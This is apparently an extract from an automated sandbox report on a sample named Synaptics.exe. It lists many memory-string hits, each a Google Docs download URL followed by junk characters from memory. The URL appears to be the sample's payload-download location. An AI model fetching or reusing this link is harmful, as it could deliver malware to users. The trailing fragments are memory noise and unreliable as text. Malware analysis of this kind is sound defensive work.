                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle0/
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-ua
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch-ua-full-version=
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch=
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadching
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclos
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadco1
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcogr/
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs.dl;
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcted6
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadctin
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcv
                          Source: Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc~
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.moo
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd0
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd1
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddate
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade-Opt
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.comRH
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadea
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadected
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadecti
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectic
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectinV.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectin_
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectinv
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelle9
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem2
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemR
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellema
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemn
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemp
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemv
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem#qS
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem3uc
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem;wk
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem?sg
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademSt
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell(
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell5
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellK
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellO
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellr
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellu
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetl
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetlz
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyoS
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor;
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyord
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnt
                          Source: Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadntent
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado(
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoM
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoa
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoad
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadocookOY
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadocume
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadod
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogleZY
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadolvin
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom.
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadones
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoq
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...L
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..J
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..q
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador/pW
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador?tg
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorGq
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador_w
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloados
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoskp
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadostna
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadostna&
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadot
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadownl
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2946052719.000000000776D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpO
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpu
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
